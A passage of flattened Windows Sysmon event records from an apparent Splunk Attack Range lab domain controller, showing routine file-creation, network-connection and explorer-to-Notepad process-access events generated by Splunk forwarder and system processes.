Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C4F9CDB31BC64789DF0218F2CDD6DC4,SHA256=16931BE062E96AA544E191C7EE0558CAA4E01E72C06398B04814F659A2652C06,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:31.468{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55145-false10.0.1.12-8000- 23542300x80000000000000001696051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:39.130{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=13B628A1E8EF33EFB8EBE93FADE41E23,SHA256=9D1451E3AABDD3A99EB553F1CB84933D533BFA8399D61FA64C07D0EF546B8507,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:39.052{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=939EE1F237C8F5926E68EA3652FD2457,SHA256=97AE1EC641A024B5CED6AA0849FB3FCDCA0687F1D6976FE941D33798092F11B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:40.427{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=857767959738D7BAE649D04A474A2E36,SHA256=20D83CFCDFBE220A5A1B8676911E4BA0481E29D49E006C1EAF01A0392E2355AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:40.072{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55D79E7D64B2E6A6433720130BB701AA,SHA256=DBA2094BD4C5AE96C211C458E53C51D1A1A51C6932DAA8C6DFA73C48C7E77B84,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:33.135{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-974.attackrange.local55146-false8.240.191.254-80http 23542300x80000000000000001696055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:41.099{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A4632808F649E5309A212033EA1BA66,SHA256=01FA7EAEF7BB8A04351C91EBCC9410CA114492D7E4104284CE78CB07D182BCD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:42.130{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37A5323B9FCB010FFE992DB1E9AA3BBC,SHA256=4E1B9617BACECE4EFFE4B7145BA62C71C3D8A7CF886B6F942BAE6D2B9F01AC07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:43.224{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC8CAFDB1AF2E6E16C0504F2070E3B45,SHA256=C7DA87BBC0C3921BC8FCA546A2103A299BA953893A4FB5789CBF674BA373A01B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:43.164{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F446F46DBBA480A36484AA8FDBB91AB4,SHA256=59FDC6F1A0A0AAB65E9D735995D940DEEE7C33A0C57D5D40C6650A0A7E5AE24D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:36.484{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55147-false10.0.1.12-8000- 23542300x80000000000000001696060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:44.255{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB56E4CD10F09E65C3510506789BE2AA,SHA256=0DEB69515394ABD4A0DC2EF6EB1D7CC78561F34361572B210F18E347CE47D2DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:45.274{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFC45B1791997B750EEC0CA0C9CFEC49,SHA256=092116AFA9A5AB8A8A5F3E32510E48AC290BD3AABA65AAA24C4D302D1548F08A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:46.349{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8222F5C37A293069EB62E8FC039715B,SHA256=0842AB24D5F63696A1FADC842EE27DD13C063A0F886D86031FC3B6D6AC725807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:47.786{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EAB99F009B45EF9FE7EC37BA059FB26C,SHA256=72AD94A5DA9A4670CE690BB8AFF03C929C793DAEB2837AE2ED4C40B6AA602915,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:47.368{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDF350E8F822FF9209B85F538FDF49E7,SHA256=32819C3EDAB230A7ABEF6916ABABB1D98D1C8720BB442ACF6A2926A68DD8E069,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:40.452{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local65381- 354300x80000000000000001696068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:40.124{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local58273- 23542300x80000000000000001696067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:48.786{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7894BE2064442C3C2364A30EE328CACD,SHA256=D0562ACCCB5D86F9B8AC726A77EC805C96B3FF5660D1CC44E8D1E30CFDE0E795,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:48.395{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2619FEFFB5091992E94F7057E6E53F22,SHA256=5F58953F0C6D22C82887EE4578FB59CE56A7DDF2D6F69B961FE2C65FCFEB21C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:41.515{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55148-false10.0.1.12-8000- 354300x80000000000000001696072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:41.467{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local65381- 354300x80000000000000001696071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:41.139{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local58273- 23542300x80000000000000001696070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:49.427{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA0A93B37A7D2573DB1A67CA4920F180,SHA256=C7F13AB31DAC4131D3A14F3C54BBBD3B5168442372616961401ED37FC8094D3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:50.463{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B61A829BB4014123C5A797244D402975,SHA256=0EBA843F59B90F2311BAA5B65A6919E8CCCFA497F4AD18236D8B7E7C80E81428,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:51.817{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D583E361EA33A7F9398A0C6E6B47EA5,SHA256=DC9075F520729C44BF1425587A475F3EBEEFEC5246E40A1DA7B1E2AFD5B0AA6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:51.467{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1AA9CB371B6F310B98A65C8D28CB72D,SHA256=11C18D06272E1E22D756C11917DF8D3520E382E1DC8933FA043A37D8E19DBBB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:52.489{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=851E2EDFF9F7E716461E6026D709CA06,SHA256=9AEDB673A05EB96BAB5FA9679D1E9E5ACC3C7901309C9DEF2D9E2C9E87334E48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:53.520{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5114B16CBC8FAD2737A539CFDDF971A0,SHA256=57A9A3F051825BB9448D563ABE7CA8644F18CF1C474E774AF04091C8A03EACB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:53.505{05ADC7E1-229F-6039-1100-00000000AD01}1152NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=0343B010AC58AA5E60174FAB6896E56A,SHA256=5FE71169DB0F3FE71CBA20DB5BBECA8B80ED57A8D4F003C112B6E90B7D468B6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.552{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A8AD6C0D00E8B0B7678DD849520EF40,SHA256=C0FA39C285F2447C6AC39262C51A33B3CBDAD9309604DD3A00061D1B5C0B6A8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.395{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E60B434A9EE12DD9E1237A9801D42CFE,SHA256=30389BFA90140E5C1E7C98CDFE05211F178A6E314669BEF3724CEFBF4757051B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001696678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 